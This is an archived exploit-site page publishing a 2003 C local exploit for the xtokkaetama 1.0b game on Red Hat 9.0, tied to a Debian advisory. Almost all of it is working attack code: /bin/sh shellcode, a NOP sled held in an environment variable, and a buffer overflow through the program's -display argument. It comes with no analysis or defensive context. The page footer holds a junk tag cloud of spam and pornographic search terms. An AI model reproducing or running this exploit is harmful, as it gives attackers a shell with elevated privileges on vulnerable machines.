about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , xtokkaetama 1.0b local game exploit on Red Hat 9.0



2003-08-01 xtokkaetama 1.0b local game exploit on Red Hat 9.0
/*
* xtokkaetama 1.0b local game exploit on Red Hat 9.0
* Coded by brahma (31/07/2003)
*
* http://www.debian.org/security/2003/dsa-356
*/


#include <stdlib.h>
#define RETADDR 0xbfffff11 
#define DEFAULT_BUFFER_SIZE 29
#define DEFAULT_EGG_SIZE 512 
#define NOP 0x90
#define BIN "/usr/X11R6/bin/xtokkaetama" 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = RETADDR; 
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
execl(BIN,BIN,"-display",buff,NULL);
}


securitydot.net - 2003-08-01

Advertising

Copyright 2007, SecurityDot
Sat, 05 Dec 2009 09:09:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
syn_flood sexxxwwwco gadis cina www.sexnyl cookie ste port 1025 Crack Data FreeBSD ma imap rfc Memek arab Realsax.Co bzhao.net all sex vi Crack+Data xxx vidoes apache lis gd-bz.net www.eranak Wap.bu.com Free porn www.lierm. cat /home/ Kayako Sup code red Www. Govas 55rm.com Free downl www.dldvb. gd-bz.net mlnjh mambo inje Firedam se Crack Data OpenSSH 4. www.9419.c sexyanimal windows xp gd-bz.net Free+Downl Flm sex ay Www.acninc www.tkyxgl shop.paipa www.cd530. www.sexmax Free sex v www.in0734 Tamil sex www.tkyxgl www.wabtri